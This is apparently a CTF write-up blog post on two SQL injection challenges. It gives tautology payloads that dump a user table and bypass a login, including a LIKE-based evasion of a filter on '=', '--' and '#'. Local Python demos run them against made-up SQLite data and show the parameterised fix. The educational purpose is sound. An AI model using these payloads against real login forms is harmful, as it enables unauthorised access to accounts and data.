I have set myself the challenge of writing up the details of each challenge I solve, as a reminder to myself, as a reference, and as a resource to help others on their CTF journeys. In this post I outline the first few SQL challenges I have completed and the rabbit holes they took me into along the way as the challenges got increasingly difficult.
ACL rulezzz the world
You are provided a simple drop-down that submits a username variable to a vulnerable server.
Passing in a single quote yields a MySQL syntax error, so that gives us a good starting point as to the database and the quoting syntax we should work with.
Using the built-in functionality, passing in a username returned three fields (Username, Group and Description):
Assuming this, the SQL query will be along the lines of:
`SELECT Username, Group, Description FROM <tablename> WHERE Username='<INPUTNAME>';`
If we then modify the query to return all of the users by appending an always-true OR condition, the SQL the server executes becomes:
`SELECT Username, Group, Description FROM <tablename> WHERE Username='admin' OR 'a'='a';`
Note we do not add a trailing quote to the payload, since the closing quote is already present in the server-side query; adding one would leave an unbalanced quote and another syntax error. Because `'a'='a'` is true for every row, the WHERE clause matches the whole table, so the query returns the details of every user, admin included.
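To make the above concrete, here is an added example (my own code, not the challenge's back end) that rebuilds the guessed query in SQLite and runs the payload against it. The table, rows and function names are constructed for illustration; the `Group` column is quoted because it is a reserved word in both SQLite and MySQL, a detail the guessed query glosses over. The parameterised variant is included to show why the same payload does nothing when the value is bound rather than spliced in.

```python
import sqlite3

# Constructed sample data standing in for the challenge's user table; the
# column names follow the query guessed above, the rows are made up.
SAMPLE_USERS = [
    ("admin", "administrators", "Site administrator"),
    ("alice", "users", "Regular user"),
    ("guest", "guests", "Anonymous access"),
]

# Payload as typed into the username field: no trailing quote, because the
# server-side query supplies the closing quote.
PAYLOAD = "admin' OR 'a'='a"


def make_db() -> sqlite3.Connection:
    """Build an in-memory table shaped like the guessed schema."""
    conn = sqlite3.connect(":memory:")
    # "Group" is reserved in SQLite and MySQL, so the identifier is quoted.
    conn.execute('CREATE TABLE users (Username TEXT, "Group" TEXT, Description TEXT)')
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Mirror the challenge: the input is spliced between two single quotes,
    so a quote in the input terminates the string literal early."""
    sql = (
        'SELECT Username, "Group", Description FROM users '
        f"WHERE Username='{username}'"
    )
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Same query, parameterised: the driver sends the value out of band, so
    the quote and the OR are just characters in the string being compared."""
    sql = 'SELECT Username, "Group", Description FROM users WHERE Username=?'
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "admin"))   # one row
    print(lookup_vulnerable(conn, PAYLOAD))   # every row in the table
    print(lookup_safe(conn, PAYLOAD))         # no rows: nobody has that name
```

Running it shows the ordinary lookup returning the single admin row, the injected lookup returning all three rows, and the parameterised lookup returning nothing, which is the whole difference between the vulnerable and the fixed code.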
Login portal 1
You are provided a simple username and password login form. I initially tested for character filtering and found that the `=` operator and the comment sequences `--` and `#` are filtered by the web app.
Since it is a login form, it is straightforward to assume the likely SQL syntax and build a simple injection bypass.
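As an added example (my own code, not the challenge's server and not the author's payload), the following models a login form of the kind described and a filter that rejects the three sequences reported above, then shows one standard way around such a filter: `LIKE` with no wildcards is an exact comparison, so a tautology can be written without `=`, and no comment sequence is needed when the payload simply leaves the server's own closing quote in place. The table, accounts and the assumption that the filter rejects the whole request are all constructed for illustration.

```python
import sqlite3

# Constructed sample accounts; the real challenge's table is not shown.
SAMPLE_ACCOUNTS = [("admin", "s3cret-not-guessable"), ("bob", "hunter2")]

# Sequences the post reports as filtered. Treating a hit as an outright
# rejection is an assumption; the exact filter behaviour is not shown.
FILTERED = ("=", "--", "#")

# Classic tautology: rejected, because it contains '='.
NAIVE_PAYLOAD = "' OR 'a'='a"

# Same truth value with none of the filtered sequences. Placed in the
# password field, AND binds tighter than OR, so the WHERE clause becomes
# (username='x' AND password='') OR 'a' LIKE 'a', which is true for every row.
LIKE_PAYLOAD = "' OR 'a' LIKE 'a"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def passes_filter(value: str) -> bool:
    """Model of the web app's blacklist: reject any filtered sequence."""
    return not any(bad in value for bad in FILTERED)


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Return the usernames the login query matches, or None when the
    blacklist rejects the input. A real app would take the first row as
    the logged-in account."""
    if not (passes_filter(username) and passes_filter(password)):
        return None
    # Both inputs are spliced straight into the query, exactly the mistake
    # the challenge relies on.
    sql = (
        f"SELECT username FROM users WHERE username='{username}' "
        f"AND password='{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "admin", "wrong"))     # []
    print(login_vulnerable(conn, "x", NAIVE_PAYLOAD))   # None (blocked)
    print(login_vulnerable(conn, "x", LIKE_PAYLOAD))    # ['admin', 'bob']
```

The point of the filtered-versus-unfiltered pair is that a blacklist of a few operators only changes the spelling of the payload, not whether the query is injectable; the fix is the same parameterisation shown in the previous example.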